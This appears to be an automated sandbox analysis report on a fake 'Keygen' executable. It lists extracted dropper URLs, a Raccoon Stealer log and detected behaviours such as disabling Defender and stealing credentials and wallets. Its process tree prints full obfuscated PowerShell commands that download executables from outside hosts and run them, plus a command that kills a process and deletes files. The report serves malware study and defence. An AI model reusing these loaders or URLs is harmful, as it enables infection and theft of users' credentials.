Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    02-10-2020 21:14

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (9).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 23:51:04 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (460 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (9).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (9).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1156
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\A007.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (9).exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1852
      • C:\Users\Admin\AppData\Local\Temp\A007.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1900
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A007.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1792
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1056
          • C:\Users\Public\wib.exe
            "C:\Users\Public\wib.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2496
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2668
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:296
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 296 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\920573725730969\\* & exit
                  8⤵
                    PID:2296
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 296
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2316
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2760
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:1664
              • C:\Users\Public\wib.exe
                "C:\Users\Public\wib.exe"
                6⤵
                • Executes dropped EXE
                PID:2904
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A007.tmp\m1.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1968
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2000
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:1824
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\A007.tmp\b.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1604
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2028
            • C:\Users\Public\sef.exe
              "C:\Users\Public\sef.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              PID:2440
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                6⤵
                • Loads dropped DLL
                PID:1236
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2312
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                    8⤵
                    • Loads dropped DLL
                    PID:2828
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2936
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:1056
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
